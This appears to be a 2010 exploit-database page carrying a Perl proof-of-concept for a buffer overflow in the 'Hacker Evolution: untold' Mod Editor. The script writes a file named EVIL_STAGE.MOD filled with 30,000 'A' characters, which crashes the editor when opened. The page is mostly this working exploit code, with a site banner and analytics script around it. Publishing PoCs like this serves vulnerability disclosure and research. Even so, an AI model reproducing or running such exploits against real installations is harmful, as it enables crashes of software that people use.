Home / os / win7

Hacker Evolution Game: untold Mod Editor buffer overflow (Po

Posted on 19 June 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Hacker Evolution Game: untold Mod Editor buffer overflow (PoC)</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>============================================================== Hacker Evolution Game: untold Mod Editor buffer overflow (PoC) ============================================================== 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' __ /'__` / \__ /'__` 0 0 /\_, ___ /\_/\_ ___ ,_/ / _ ___ 1 1 /_/ /' _ ` / /_/_\_&lt;_ /'___ / /`'__ 0 0 / / / / \__/ \_ \_ / 1 1 \_ \_ \_\_ \____/ \____\ \__\ \____/ \_ 0 0 /_//_//_/ \_ /___/ /____/ /__/ /___/ /_/ 1 1 \____/ &gt;&gt; Exploit database separated by exploit 0 0 /___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : Inj3ct0r.com 0 1 [+] Support e-mail : submit[at]inj3ct0r.com 1 0 0 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1 #!/usr/bin/perl # Title : Hacker Evolution: untold Mod Editor buffer overflow # Date : June 19, 2010 # Author : gunslinger_ &lt;yudha.gunslinger@gmail.com&gt; # Web : http://devilzc0de.com # Blog : http://gunslingerc0de.wordpress.com # Software Link : http://www.exosyphen.com/page_hacker-evolution-untold.html # Version : 2.00.001 # Tested on : Windows XP SP2 # Open Hacker Evolution Mod editor -&gt; open file -&gt; EVIL_STAGE.MOD my $file= &quot;EVIL_STAGE.MOD&quot;; my $junk= &quot;x41&quot; x 30000; open($FILE,&quot;&gt;$file&quot;); print $FILE &quot;$junk&quot;; close($FILE); print &quot;MOD File Created successfully &quot;; # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-06-19]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP